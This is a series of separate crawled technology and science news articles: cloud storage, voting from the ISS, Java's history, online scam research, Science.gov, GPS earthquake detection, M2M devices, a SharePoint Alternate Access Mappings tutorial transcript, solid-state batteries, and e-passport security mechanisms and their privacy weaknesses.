the need to integrate with compute nodes that have a block-level or file-level interface. There is also the cloud data bootstrap problem of how to get the data into the cloud in the first place, which can be done efficiently by block-level transfer. The power of a unified cloud storage system is in the network effect of having a single management interface that allows managing users, multiple tenants, storage and resource quotas, security, access management with ACLs (access control lists) for sharing, and other functions. With the single management interface, the system administrator can effectively control a backend storage system that serves a wide variety of users, from those using only a small slice of its functionality (e.g., object storage only) to those using the full scope of data access and processing.
By Gary Ogasawara
Gary Ogasawara is the VP of Engineering at Gemini Mobile Technologies. He has worked on large scale mail systems for service providers and other high-performance, high-volume software systems. Gemini's Cloudian™ product is an S3-compatible storage software package.
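For reference, the object-level interface described above is typically exercised through an S3-compatible API. A minimal sketch using the boto3 client follows; the endpoint URL, credentials, bucket and key are placeholders, and any S3-compatible store could sit behind the endpoint.

# Minimal sketch of object-level access through an S3-compatible API using boto3.
# Endpoint, credentials, bucket and key are placeholders for illustration only.
import boto3

s3 = boto3.client(
    "s3",
    endpoint_url="https://objects.example.com",   # placeholder S3-compatible endpoint
    aws_access_key_id="ACCESS_KEY",
    aws_secret_access_key="SECRET_KEY",
)

# Write an object together with application-level metadata, then read it back.
s3.put_object(
    Bucket="analytics",
    Key="reports/2012-06.json",
    Body=b'{"events": 42}',
    Metadata={"kind": "report", "retention": "1y"},
)
obj = s3.get_object(Bucket="analytics", Key="reports/2012-06.json")
print(obj["Body"].read())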
<urn:uuid:86e9af6c-9f58-41fa-99f2-f67aaac1a0e1>
CC-MAIN-2017-09
https://cloudtweaks.com/2012/06/unified-storage-for-the-cloud-means-higher-level-interfaces/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171632.91/warc/CC-MAIN-20170219104611-00243-ip-10-171-10-108.ec2.internal.warc.gz
en
0.905234
660
2.625
3
Leroy Chiao holds a special distinction: Not only did the American astronaut fly on three shuttle flights and serve as the commander of the tenth expedition to the International Space Station; he is also the first person ever to vote for president from space. Chiao cast his ballot from the International Space Station during the 2004 campaign. And that makes him not just the first person to vote for president from zero gravity, but also one of only a handful of people ever to vote from beyond Earth's borders. In 1997, David Wolf became the first person to cast an absentee ballot from space; he voted in a Texas municipal election from the Mir space station. In 2008, Michael Fincke and Gregory Chamitoff used electronic ballots to vote in both local and national elections. As for yesterday's election, the two Americans aboard the ISS for the 2012 cycle -- Suni Williams and Kevin Ford -- took care of voting before they launched: They made their choices via terrestrial absentee ballot while they were stationed in Russia. Chiao and his fellow space-voters benefitted from a bill passed in 1997 by Texas legislators, which established a procedure for astronauts -- most of whom reside in Houston -- to vote from space. (The bill was signed by then-governor George W. Bush.) The system uses the same email-based procedure employed by U.S. residents who live overseas at the time of an election. In Chiao's case, an electronic ballot, generated by the Galveston County Clerk's office, was emailed to his secure account at NASA's Johnson Space Center. Mission Control then transferred that email to the space station, and to Chiao within it, using a high-speed modem via satellite -- the same way astronauts receive all their emails while they're aboard the ISS.
<urn:uuid:67955f7a-13a0-48ba-b16e-d6e1610821ec>
CC-MAIN-2017-09
http://www.nextgov.com/emerging-tech/2012/11/what-its-vote-president-space/59347/?oref=ng-channelriver
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172649.58/warc/CC-MAIN-20170219104612-00595-ip-10-171-10-108.ec2.internal.warc.gz
en
0.970823
360
2.84375
3
Remembering what the programming world was like in 1995 is no easy task. Object-oriented programming, for one, was an accepted but seldom practiced paradigm, with much of what passed as so-called object-oriented programs being little more than rebranded C code that used >> instead of printf and class instead of struct. The programs we wrote in those days routinely dumped core due to pointer arithmetic errors or ran out of memory due to leaks. Source code could barely be ported between different versions of Unix. Running the same binary on different processors and operating systems was crazy talk. Java changed all that. While platform-dependent, manually allocated, procedural C code will continue to be with us for the next 20 years at least, Java proved this was a choice, not a requirement. For the first time, we began writing real production code in a cross-platform, garbage-collected, object-oriented language; and we liked it ... millions of us. Languages that have come after Java, most notably C#, have had to clear the new higher bar for developer productivity that Java established. James Gosling, Mike Sheridan, Patrick Naughton, and the other programmers on Sun's Green Project did not invent most of the important technologies that Java brought into widespread use. Most of the key features they included in what was then known as Oak found their origins elsewhere:
- A base Object class from which all classes descend? Smalltalk.
- Strong static type-checking at compile time? Ada.
- Multiple interface, single implementation inheritance? Objective-C.
- Inline documentation? CWeb.
- Cross-platform virtual machine and byte code with just-in-time compilation? Smalltalk again, especially Sun's Self dialect.
- Garbage collection? Lisp.
- Primitive types and control structures? C.
- Dual type system with non-object primitive types for performance? C++.
Java did, however, pioneer new territory. Nothing like checked exceptions had appeared in any language before, or has since. Java was also the first language to use Unicode in the native string type and the source code itself. But Java's core strength was that it was built to be a practical tool for getting work done. It popularized good ideas from earlier languages by repackaging them in a format that was familiar to the average C coder, though (unlike C++ and Objective-C) Java was not a strict superset of C. Indeed it was precisely this willingness to not only add but also remove features that made Java so much simpler and easier to learn than other object-oriented C descendants. Java did not (and still does not) have header files. An object-oriented language not shackled by a requirement to run legacy code didn't need them. Similarly, Java wisely omitted ideas that had been tried and found wanting in other languages: multiple implementation inheritance, pointer arithmetic, and operator overloading most noticeably. This good taste at the beginning means that even 20 years later, Java is still relatively free of the "here be dragons" warnings that litter the style guides for its predecessors. Still, applets were what inspired us to work with Java, and what we discovered was a clean language that smoothed out many of the rough edges and pain points we'd been struggling with in alternatives such as C++. Automatic garbage collection alone was worth the price of admission. Applets may have been overhyped and underdelivered, but that didn't mean Java wasn't a damn good language for other problems.
Originally intended as a cross-platform client library, Java found real success in the server space. Servlets, Java Server Pages, and an array of enterprise-focused libraries that were periodically bundled together and rebranded in one confusing acronym or another solved real problems for us and for business. Marketing failures aside, Java achieved near-standard status in IT departments around the world. (Quick: What's the difference between Java 2 Enterprise Edition and Java Platform Enterprise Edition? If you guessed that J2EE is the successor of JEE, you got it exactly backward.) Some of these enterprise-focused products were on the heavyweight side and inspired open source alternatives and supplements such as Spring, Hibernate, and Tomcat, but these all built on top of the foundation Sun set. Arguably the single most important contribution of open source to Java and the wider craft of programming is JUnit. Test-driven development (TDD) had been tried earlier with Smalltalk. However, like many other innovations of that language, TDD did not achieve widespread notice and adoption until it became available in Java. When Kent Beck and Erich Gamma released JUnit in 2000, TDD rapidly ascended from an experimental practice of a few programmers to the standard way to develop software in the 21st century. As Martin Fowler has said, "Never in the field of software development was so much owed by so many to so few lines of code," and those few lines of code were written in Java. Twenty years since its inception, Java is no longer the scrappy upstart. It has become the entrenched incumbent other languages rebel against. Lighter-weight languages like Ruby and Python have made significant inroads into Java's territory, especially in the startup community where speed of development counts for more than robustness and scale -- a trade-off that Java itself took advantage of in the early days when performance of virtual machines severely lagged compiled code. Java, of course, is not standing still. Oracle continues to incorporate well-proven technologies from other languages such as generics, autoboxing, enumerations, and, most recently, lambda expressions. Many programmers first encountered these ideas in Java. Not every programmer knows Java, but whether they know it or not, every programmer today has been influenced by it. This story, "Java at 20: How it changed programming forever" was originally published by InfoWorld.
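JUnit itself is a Java library, but the xUnit shape it popularized is language-agnostic: a small test class whose assertions drive the red/green cycle. Below is a rough sketch of that shape using Python's built-in unittest module; the function under test is invented purely to give the test something to check.

# A minimal xUnit-style test in the pattern JUnit popularized, sketched with
# Python's standard unittest module. The function under test is hypothetical.
import unittest

def profit_margin(revenue: float, profit: float) -> float:
    """Return profit as a percentage of revenue, rounded to one decimal place."""
    return round(profit / revenue * 100, 1)

class ProfitMarginTest(unittest.TestCase):
    def test_typical_values(self):
        self.assertEqual(profit_margin(200.0, 50.0), 25.0)

    def test_zero_revenue_raises(self):
        with self.assertRaises(ZeroDivisionError):
            profit_margin(0.0, 10.0)

if __name__ == "__main__":
    unittest.main()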
<urn:uuid:0b66bb80-bad3-4ade-a811-4bc2b5ea3e34>
CC-MAIN-2017-09
http://www.itnews.com/article/2923773/java/java-at-20-how-java-changed-programming-forever.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170521.30/warc/CC-MAIN-20170219104610-00539-ip-10-171-10-108.ec2.internal.warc.gz
en
0.955864
1,265
3.34375
3
Women aged 25 to 34 are most likely to fall victim to online scams, according to research published today. The research was commissioned by an online advice site, knowthenet.org.uk, to build up a picture of the likeliest online scam victims. It measured the ability of more than 2,000 consumers to spot and respond appropriately to seven online scam scenarios. The tests ranged from identifying fake Facebook pages to testing how consumers respond to competition scams or the sale of counterfeit goods online. In six out of the seven tests, women proved the most likely to fail, and most of those were in the 25-34 age group. However, the most likely victim depended on the type of scam. For example, among those who fell for confidence tricks, 53% were men. With internet scams on the rise, this means anyone, whether they use the internet regularly or not, could be at risk, the research concluded. "Scammers are becoming more devious in how they target victims and are constantly changing their attacks to reflect what people expect to see online or are interested in," said Peter Wood, security expert at knowthenet.org.uk. New tricks, such as pharming, work by redirecting the user's web browser, he said, so that when they type in a legitimate web address, they are redirected, without realizing it, to a bogus site that appears genuine. "People then happily type in their personal details and don't know they are being scammed before it's too late," he said. The popularity of social networks such as Facebook also means many people give away far too much personal data on the web, said Wood, which can be a goldmine for scammers. Launched by Nominet, the knowthenet.org.uk site was developed to provide independent advice and support on getting started online, staying safe online, and doing business online. Online fraud affects 1.8 million Britons every year, costing the economy £2.7bn, according to National Fraud Authority research published in January 2010.
<urn:uuid:d5c4591e-8439-4f88-bb47-8eb53bd06d27>
CC-MAIN-2017-09
http://www.computerweekly.com/news/1280094314/Young-women-are-the-most-likely-victims-of-online-scams-research-shows
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171646.15/warc/CC-MAIN-20170219104611-00591-ip-10-171-10-108.ec2.internal.warc.gz
en
0.973464
448
2.5625
3
Science.gov launches a new version
- By Doug Beizer - Sep 23, 2008
A new version of Science.gov — a free, single-search gateway for science and technology information from 17 organizations in 13 federal science agencies — was launched recently. Science.gov 5.0 lets users search additional collections of science resources. It also makes it easier to target searches and find links to information on a variety of science topics. The Energy Department hosts the site, which was announced Sept. 15. The new version of the Web gateway has seven new databases and portals that give researchers access to more than 200 million pages of scientific information. New information available includes thousands of patents from Energy Department research and development, and documents and bibliographic citations of DOE accomplishments, the department said. Science.gov 5.0 also has a clustering tool that helps target searches by grouping results by subtopic or date. The new version of the Web site also provides links to related EurekAlert! Science News and Wikipedia entries, and provides the capability to download research results into personal files or citation software. Science.gov is hosted by DOE's Office of Scientific and Technical Information in DOE's Office of Science. It is supported by contributing members of the Science.gov Alliance, which include the Agriculture, Commerce, Defense, Education, Health and Human Services, and Interior departments, the Environmental Protection Agency, the Government Printing Office, the Library of Congress, NASA and the National Science Foundation.
Doug Beizer is a staff writer for Federal Computer Week.
<urn:uuid:9a505d56-ebb0-4286-9559-27524632e744>
CC-MAIN-2017-09
https://fcw.com/articles/2008/09/23/sciencegov-launches-a-new-version.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171646.15/warc/CC-MAIN-20170219104611-00591-ip-10-171-10-108.ec2.internal.warc.gz
en
0.916845
317
2.71875
3
NASA looks to space for better earthquake data
- By Henry Kenyon - Apr 27, 2012
A space-based earthquake detection system will soon be providing scientists and first responders with accurate and precise real-time data about the location and intensity of a seismic event. The prototype system, which NASA is testing on the West Coast, uses satellites to monitor ground-based Global Positioning System sensors for minute changes in their location. The Real-time Earthquake Analysis for Disaster (READI) Mitigation Network uses GPS data streamed in from about 500 ground stations across California, Oregon and Washington. When a major earthquake occurs, the GPS data is used to automatically calculate its location, magnitude and other geological details, NASA said in a release announcing the project. READI is based on decades of research by the National Science Foundation, the Defense Department, NASA and the U.S. Geological Survey. Conventional seismic networks have had difficulty in pinpointing the true size of the major earthquakes of the past decade, Timothy Melbourne, director of Central Washington University's Pacific Northwest Geodetic Array, said in a statement. "This GPS system is more likely to provide accurate and rapid estimates of the location and amount of fault slip to fire, utility, medical and other first responder teams," he said. Rapidly identifying and locating earthquakes of magnitude 6.0 and higher is vital for first response and disaster mitigation efforts, especially when there is the possibility of a tsunami, NASA said. Precise, by-the-second measurements of ground displacement with GPS-based sensors have been demonstrated to reduce the time needed to verify the scale and location of a large earthquake and to increase the accuracy of tsunami predictions. After the READI network's capabilities have been fully tested and demonstrated, it will be handed over to federal natural disaster monitoring agencies such as the USGS and the National Oceanic and Atmospheric Administration. A number of institutions are collaborating to support and operate the READI network. They include Scripps at the University of California in San Diego; Central Washington University in Ellensburg; the University of Nevada in Reno; the California Institute of Technology/Jet Propulsion Laboratory in Pasadena; UNAVCO in Boulder, Colo.; and the University of California at Berkeley. The GPS stations in the network are supported by NASA, NSF, USGS and other federal, state and local organizations.
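The core signal such a network looks for is a sudden, persistent jump in a station's position. The toy sketch below flags that kind of jump from per-second positions in a local east/north/up frame; the threshold, station data and units are invented for illustration and are far simpler than the real READI processing.

# Toy illustration only: flag a sudden ground displacement from per-second GPS
# positions (metres, local east/north/up frame). Threshold and data are invented.
import math

DISPLACEMENT_THRESHOLD_M = 0.05

def flag_offset(samples):
    """samples: list of (seconds, (east, north, up)) tuples for one station."""
    _, origin = samples[0]
    for t, pos in samples[1:]:
        d = math.dist(origin, pos)
        if d > DISPLACEMENT_THRESHOLD_M:
            return t, d
    return None

station = [(0, (0.000, 0.000, 0.000)),
           (1, (0.004, 0.002, 0.001)),
           (2, (0.090, 0.110, 0.020))]
hit = flag_offset(station)
if hit:
    print(f"Possible coseismic offset at t={hit[0]} s: {hit[1]:.3f} m")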
<urn:uuid:b2fe423e-5d57-415d-9bfb-56e89df019bb>
CC-MAIN-2017-09
https://gcn.com/articles/2012/04/27/nasa-space-based-earthquake-detector.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170823.55/warc/CC-MAIN-20170219104610-00412-ip-10-171-10-108.ec2.internal.warc.gz
en
0.926138
511
3.09375
3
What is M2M, and why is it the future of code?
- By John Breeden II - Mar 22, 2013
The next great horizon may well be machine-to-machine (M2M) technology. At the recent Oracle conference, the company was touting "an ecosystem of solutions" that uses embedded devices to facilitate real-time analysis of events and data among the "Internet of Things," according to the Dr. Dobb's website. Much of the M2M information is delivered in the form of sparse data, which can come from sensors and other non-IT devices. The data itself may be only a couple of kilobytes and wouldn't make much sense out of context. But there is so much of it being generated that, taken together, it can create a full picture. Applications are needed not only to enable devices to talk with others using M2M, but also to collect all the data and make sense of it. Pretty much any device can be connected with M2M technology. In fact, Machina Research, a trade group for mobile device makers, predicts that within the next eight years, the number of connected devices using M2M will top 50 billion worldwide. That connected-device population will include everything from power and gas meters that automatically report usage data, to wearable heart monitors that automatically tell a doctor when a patient needs to come in for a checkup, to traffic monitors and cars that, by 2014, will automatically report their position and condition to authorities in the event of an accident. Although M2M has actually been around since the early days of computing, it has recently evolved to the point where devices can communicate wirelessly without a human or centralized component. The most popular M2M setup thus far has been to create a central hub that accepts both wireless and wired signals from connected devices. Field sensors would note an event, be it a temperature change, the removal of a piece of inventory or even a door opening. They would then send that data to a central location where an operator might turn down the AC, order more toner cartridges or tell security about suspicious activity. The model for M2M in the future, however, eliminates the central hub and instead has devices communicating with each other and working out problems on their own. So an M2M device will be able to automatically turn on the AC in an overheated space, order more toner when it senses that supplies are low or alert security if a door opens at an odd hour. Many M2M devices rely on cellular technology to get their messages out, which is why mobile companies such as Verizon and Sprint are ramping up their M2M efforts. Devices don't have to communicate over the cell network, as many still use land lines. But the ability to do so, especially if they also have an independent power source like a battery for backup, untethers the devices from the organization they are assigned to. And the more the machine can operate independently, the more work it can do without human intervention. Humans probably will still need to be in the chain to oversee the different processes, but they will become more of a second pair of eyes and less of a direct supervisor. If everything goes well, the machines will do all the work, and the humans will only need to step in if a machine reports a problem, like a communications failure. With 50 billion connected devices coming online soon, the need for applications (and developers) to manage all of that, to make the connections between devices work and to make sure it all runs smoothly will be tremendous.
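A rough sketch of that hub-less pattern follows: one device publishes a reading and a peer device decides on an action by itself, with no central operator in the loop. The message format, device names and thresholds are invented for illustration.

# Toy sketch of hub-less M2M: a peer device reacts to a sensor's report on its
# own, with no central hub or human operator. The message format is invented.
import json

class ThermostatDevice:
    """Peer device that reacts to temperature reports from nearby sensors."""
    def __init__(self, setpoint_c=24.0):
        self.setpoint_c = setpoint_c
        self.ac_on = False

    def on_message(self, raw: str):
        msg = json.loads(raw)
        if msg.get("type") == "temperature" and msg.get("value_c", 0) > self.setpoint_c:
            self.ac_on = True
            print(f"AC switched on: {msg['sensor']} reported {msg['value_c']} C")

# A sensor node would publish something like this over a cellular or wired link.
report = json.dumps({"type": "temperature", "sensor": "room-12", "value_c": 27.5})
ThermostatDevice().on_message(report)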
Agencies wanting to know more about M2M development can visit the Eclipse Foundation to learn more. John Breeden II is a freelance technology writer for GCN.
<urn:uuid:fa176411-3b88-4e68-b687-7642b95ad6df>
CC-MAIN-2017-09
https://gcn.com/articles/2013/03/22/m2m-future-of-code.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171670.52/warc/CC-MAIN-20170219104611-00288-ip-10-171-10-108.ec2.internal.warc.gz
en
0.945798
763
2.9375
3
Researchers have developed a new material for a basic battery component that they say will enable almost indefinite power storage. The new material -- a solid electrolyte -- could not only increase battery life, but also storage capacity and safety, as liquid electrolytes are the leading cause of battery fires. Today's common lithium-ion batteries use a liquid electrolyte -- an organic solvent that has been responsible for overheating and fires in cars, commercial airliners and cell phones. With a solid electrolyte, there's no safety problem. "You could throw it against the wall, drive a nail through it — there's nothing there to burn," said Gerbrand Ceder, a professor of materials science and engineering at MIT and one of the main researchers. Additionally, with a solid-state electrolyte, there's virtually no degradation, meaning such batteries could last through "hundreds of thousands of cycles," Ceder added. Organic electrolytes also have limited electrochemical stability, meaning they lose their ability to produce an electrical charge over time. Along with MIT, scientists from the Samsung Advanced Institute of Technology, the University of California at San Diego and the University of Maryland conducted the research. The researchers, who published their findings in the peer-reviewed journal Nature Materials, described the solid-state electrolytes as an improvement over today's lithium-ion batteries. Electrolytes are one of three main components in a battery, the other two being the terminals -- the anode and the cathode. A battery's electrolyte component separates the battery's positive cathode and negative anode terminals, and it allows the flow of ions between terminals. A chemical reaction takes place between the two terminals producing an electric current. A past problem with solid electrolytes is that they could not conduct ions fast enough to be efficient energy producers. The MIT/Samsung team says it overcame that problem. Another advantage of a solid-state lithium-ion battery is that it can perform under frigid temperatures. Ceder said solid-state electrolytes could be "a real game-changer" creating "almost a perfect battery." This story, "Samsung, MIT say their solid-state batteries could last a lifetime" was originally published by Computerworld.
<urn:uuid:1329c173-898a-4014-85ab-cca65a6e0de6>
CC-MAIN-2017-09
http://www.itnews.com/article/2973483/sustainable-it/samsung-mit-say-their-solid-state-batteries-could-last-a-lifetime.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174215.11/warc/CC-MAIN-20170219104614-00164-ip-10-171-10-108.ec2.internal.warc.gz
en
0.94051
458
3.578125
4
Hello, and welcome to this video. My name is James Olorunosebi, and I will be your guide for this video tutorial. Today we will be looking at Alternate Access Mappings (AAM). So why do we have to use Alternate Access Mappings? We have to use alternate access mappings because, typically, in a server environment you would have a server box. Now, my handwriting and my drawings are pretty terrible, but we can make do with this. Okay, this is our server box. The servers that belong to our SharePoint farm already have names. In our scenario we have a server by the name SPS-SQLDB. This is the server name. And we have another server, our domain controller, called DCEX-1 (labeled DEEX-1 in the on-screen diagram). Now, when we install SharePoint, what SharePoint does is take the name of the server and make it the default URL for the SharePoint installation. So we would end up with a URL akin to this: http://sps-sqldb:2015. If we had installed SharePoint on this machine, the URL would have become http://dcex-1:2015 in similar fashion. Now, when we create site collections in SharePoint, the site collections will also follow a similar naming pattern. For example, we create a site collection in SharePoint and call it, say, testlabintranet. We would end up with a URL of http://sps-sqldb -- if it is sitting on port 80, the port will not show -- followed by /sites/testlabintranet/default.aspx (http://sps-sqldb/sites/testlabintranet/default.aspx). Now, when users browse to our SharePoint site, this URL is what they would find. This URL has a problem: it is revealing the name of the server. The server box name is being exposed. In our offices we have different kinds of people who visit, and many times some of them are going to see the URLs of the resources that we use, and if those resources bear your exact server machine names, that becomes a problem. So what alternate access mappings (AAM) does is cloak the server machine name and give end users a user-friendly name. Not only is it good for giving users friendly names, it's also good for security. So what we'll do with AAM is, rather than have the site coming up with a name like this, configure what is known as an Internal URL and what is known as a Public URL. The public URL is what we would have after we are through configuring it in the AAM settings -- for example, http://testlab/sites and so on (http://testlab/sites/testlabintranet/default.aspx). Now for the demonstration on how to configure AAM (Alternate Access Mappings). Currently, we have our SharePoint site; let's take this into full screen. Currently we have our SharePoint site sitting on this address, revealing the name of the server, and the site collections reveal the name of this server as well. It is not so much of a problem if, as an administrator, you come into your SharePoint environment and you have to work with your server name; after all, you are the administrator. But for our public users, our other users in the office or the company, they should not have to work with this URL. Sometimes this URL can become so complicated that many of them cannot remember it. So we have to give them something that they can easily remember. So we configure alternate access mappings.
So for starters, to make the name we are going to use in the alternate access mapping available, the first thing we'll do is go to the domain controller and tell DNS (Domain Name System), "Hey DNS, this is the name we want you to look out for when users contact you for resources on SharePoint. When they send in this URL to you, take it, translate it to this other machine name or IP address, and give them the page that they want." I go to the domain controller and turn it on. I am going to create a host record. Start → Administrative Tools → DNS. Right-click the right-hand pane and select New Host (A or AAAA). In the New Host dialog box, in the Name (use current domain name if blank) field, type intenseschool. In the IP Address section, type in the IP address of the SharePoint server machine, in this case 10.0.0.2. Uncheck Create associated pointer (PTR) record. Click Add Host. A DNS success dialog box appears with the message "The host record intenseschool.testlab.com was successfully created." Now, before I leave this place, I am going to click Start → Command Prompt to tell the system to do a group policy update, and I am just going to force that (gpupdate /force). "Group policy update has completed successfully" is displayed in the Command Prompt window. I close this. Then we come to the SharePoint server; this is where we need to create the intenseschool alternate access name. I will click Add Internal URL. On the Add Internal URLs page, ensure the Alternate Access Mapping Collection web application is the correct one, in this case the SharePoint 80 web application. In the Add Internal URL section, in the URL, protocol, host and port text box, type http://intenseschool. In the Zone dropdown section, select Extranet. I am using the Extranet zone because that is a zone I have not used yet. Click Save. So we have intenseschool on the Extranet zone. What I am going to do is click on it, just to be sure. As you can see, it's on the Extranet zone. I am going to OK out of there. Then I am going to click on Edit Public URL; just to be sure again, you can see it is on the Extranet zone -- it's come in there. Click Save out of there. And now I don't have to do anything here anymore. I'll go to the client machine and put it in there, but before I do that, I am just going to minimize this, run the command line, and tell this machine to gpupdate /force. Okay, that completed successfully, so I am going to close this box. I am going to open the browser one more time, copy this URL, open a new page, paste it in, and edit the URL, changing it from intranet or sps-sqldb (or whatever else you may have on yours) to intenseschool. Hit Enter, let's see if that goes, and voila! So you see, our alternate access mapping is working just fine. Thank you for watching this video on configuring Alternate Access Mappings for SharePoint; see you again next time.
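As a quick sanity check after a walkthrough like this, you can confirm from a client that the new host record resolves and that the mapped URL answers. The sketch below uses only the Python standard library; the host name and URL are the ones used in this demo, and an HTTP 401 response simply means the site is up but wants credentials.

# Quick client-side check that the new name resolves and the mapped URL answers.
# Host and URL match the walkthrough above; adjust them for your environment.
import socket
import urllib.request

host = "intenseschool"   # A record created on the domain controller above
url = "http://intenseschool/sites/testlabintranet/default.aspx"

print("Resolves to:", socket.gethostbyname(host))

try:
    with urllib.request.urlopen(url, timeout=10) as resp:
        print("HTTP status:", resp.status)
except Exception as exc:   # e.g., HTTP 401 until the browser negotiates authentication
    print("Request returned:", exc)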
<urn:uuid:fab71e28-8be4-4433-8c38-1c9cd74061c3>
CC-MAIN-2017-09
http://resources.intenseschool.com/video-sharepoint-2013-alternate-access-mapping/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501169776.21/warc/CC-MAIN-20170219104609-00408-ip-10-171-10-108.ec2.internal.warc.gz
en
0.915009
1,582
2.625
3
The global introduction of electronic passports is a large coordinated attempt to increase passport security. Issuing countries can use the technology to combat passport forgery and look-alike fraud. While addressing these security problems, other security aspects, e.g. privacy, should not be overlooked. This article discusses the theoretical and practical issues, which impact security for both citizens and issuing countries. Existing legacy passports are paper-based and use related security features. Despite advanced optical security features, paper-based travel documents are vulnerable to fraud. Two forms of fraud are most notable:
- Passport forgery: a relatively complex approach where the fraudster uses a false passport, or makes modifications to a passport.
- Look-alike fraud: a simple approach where the fraudster uses a (stolen) passport of somebody with visual resemblance.
The ICAO (International Civil Aviation Organization) has been working on what it calls MRTD (Machine Readable Travel Document) technology for quite a while. This technology should help to reduce fraud and support immigration processes. The MRTD specifications became a globally coordinated attempt to standardize advanced technology to deliver strong identification methods. Rather than using common practices from the security industry, the MRTD standards aimed at a revolutionary combination of advanced technology, including contactless smartcards (RFID), public key cryptography, and biometrics. The MRTD specs support storage of a certificate proving authenticity of the document data. The signed data includes all regular passport data, including a bitmap of the holder's picture. Further data that may be stored in the e-passport includes both static and dynamic information:
- Custody Information
- Travel Record Detail(s)
- Tax/Exit Requirements
- Contact Details of Person(s) to Notify
Since 2005 several countries have started issuance of e-passports. The first generation of e-passports includes some, but not all, of the planned security features. Biometric verification is generally not supported by the first generation. All 189 ICAO member states are committed to issuing e-passports by 2010. From 2007 onward immigration services will start using e-passports. Authorities promote e-passports by offering visa-waiver programs for travelers with e-passports. A passport that conforms to the MRTD standard can be recognized by the e-passport logo on the cover.
Figure 1: The Electronic Passport logo.
Electronic Passport security mechanisms
With the aim of reducing passport fraud, the MRTD specs primarily addressed methods to prove the authenticity of the passport, its data, and the passport holder. The technology used for this includes PKI (Public Key Infrastructure), dynamic data signing and biometrics. The latter (biometrics), however, is still under discussion and not yet fully crystallized in the specifications. PKI (Public Key Infrastructure) technology was chosen to prove the authenticity of the passport data. This technology is successfully applied on the internet for e-commerce, and has gained high popularity. Certificate-based authentication only requires the inspection system to read the certificate, after which it can use a cryptographic computation to validate the authenticity using the public key of the issuing country. This method is called passive authentication and works with RFID chips that lack public key cryptographic facilities, since it involves only static data reading.
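The heart of such a passive-authentication check is an ordinary signature verification: the inspection system checks the issuing country's signature over the document data with that country's public key. A stripped-down sketch using the third-party cryptography package is shown below; a real implementation wraps this in the Document Security Object and certificate chain defined by the spec, and the padding and hash shown here are just one allowed combination.

# Core of a passive-authentication-style check: verify the issuer's signature
# over the document data. Real e-passports wrap this in a Document Security
# Object and a CA chain; this sketch shows only the final RSA verification.
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding

def document_data_is_authentic(country_public_key, data: bytes, signature: bytes) -> bool:
    try:
        country_public_key.verify(
            signature,
            data,
            padding.PKCS1v15(),   # one of the signature schemes the spec allows
            hashes.SHA256(),
        )
        return True
    except InvalidSignature:
        return False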
Although the authenticity of the data can be verified, passive authentication does not guarantee the authenticity of the passport itself: it could be a clone (electronically identical copy). The cloning problem is addressed with an optional signing mechanism called active authentication. This method requires the presence of an asymmetric key pair and public key cryptographic capabilities in the chip. The public key, signed by the issuing country and verified by passive authentication, can be given to the inspection system, which allows verification of a dynamic challenge signed with the private key. Because the private key is well protected by the chip, this effectively prevents cloning, since the inspection system can establish the authenticity of the passport chip with the active authentication mechanism. For the incorporation of modern electronic technology in the existing paper documents it was decided to use (contactless) RFID chips. These chips can be embedded in a page of the document and place no additional requirements on the physical appearance of the passport. A question that arises here is whether this is the only reason to apply RFIDs instead of contact-based cards. Other reasons could be related to the form factor of contact smart cards, which complicates embedding in a passport booklet, or the fact that contacts may be disturbance sensitive due to travel conditions. With the choice of RFID, the privacy issue arises. RFIDs can be accessed from distances up to 30 cm, and the radio waves between a terminal and an RFID can be eavesdropped from a few meters away. An adversary with dedicated radio equipment can retrieve personal data without the passport owner's consent. This risk is particularly notable in a hostile world where terrorists want to select victims based upon their nationality, or criminals commit identity theft for a variety of reasons.
Figure 2: Radio communication between inspection system and passport.
Basic Access Control
To protect passport holder privacy, the optional Basic Access Control (BAC) mechanism was designed. This mechanism requires an inspection system to use symmetric encryption on the radio interface. The key for this encryption is static and derived from three primary properties of the passport data: 1) the holder's date of birth; 2) the expiry date of the passport; 3) the passport number. This data is printed in the Machine Readable Zone (MRZ), a strip at the bottom of one of the passport pages (see Figure 3). In a normal access procedure the MRZ data is read first with an OCR scanner. The inspection system derives the access key from the MRZ data and can then set up an encrypted radio communication channel with the chip to read out all confidential data.
Figure 3: Passport with Machine Readable Zone (MRZ).
The BAC mechanism does provide some additional privacy protection, but there are two limitations that weaken it:
- The BAC key is individual but static, and is computed and used for each access. An adversary needs to get hold of this key only once and will from then on always be able to get access to a passport's data. A passport holder may perceive this as a disadvantage considering the possibility that a passport contains dynamic data.
- The BAC key is derived from data that may lack sufficient entropy: the date of expiry is always in a window of less than ten years, the date of birth can often be estimated and the document number may be related to the expiry date.
The author of this article discovered BAC security issues in July 2005 and showed that the key entropy, which could reach 66 bits, may drop below 35 bits due to internal data dependencies. When passport numbers are, for instance, allocated sequentially, they have a strong correlation with the expiry date, effectively reducing the key entropy. An eavesdropper would then be able to compute the BAC key in a few hours and decode all confidential data exchanged with an inspection system. The Netherlands, and maybe other countries, have changed their issuance procedures since this report to strengthen the BAC key. An associated privacy problem comes with the UID (Unique Identification) number emitted by an RFID immediately after startup. This number, if static, allows an easy way of tracking a passport holder. In the context of e-passports it is important that this number is dynamically randomized and that it cannot be used to identify or track the e-passport holder. The reader should note that these privacy issues originate from the decision to use RFID instead of contact card technology. Had this decision been otherwise, the privacy debate would have been different, as it would be the passport holder who implicitly decides who can read his passport by inserting it into a terminal.
Inspection system security issues
The use of electronic passports requires inspection systems to verify the passport and the passport holder. These inspection systems are primarily intended for immigration authorities at border control. Obviously the inspection systems need to support the security mechanisms implemented in an e-passport. This appears to be a major challenge due to the diversity of options that may be supported by individual passports. In terms of security protocols and information retrieval the following basic options are allowed:
- Use of Basic Access Control (including OCR scanning of MRZ data)
- Use of Active Authentication
- Amount of personal data included
- Number of certificates (additional PKI certificates in the validation chain)
- Inclusion of dynamic data (for example visas)
Future generations of the technology will also allow the following options:
- Use of biometrics
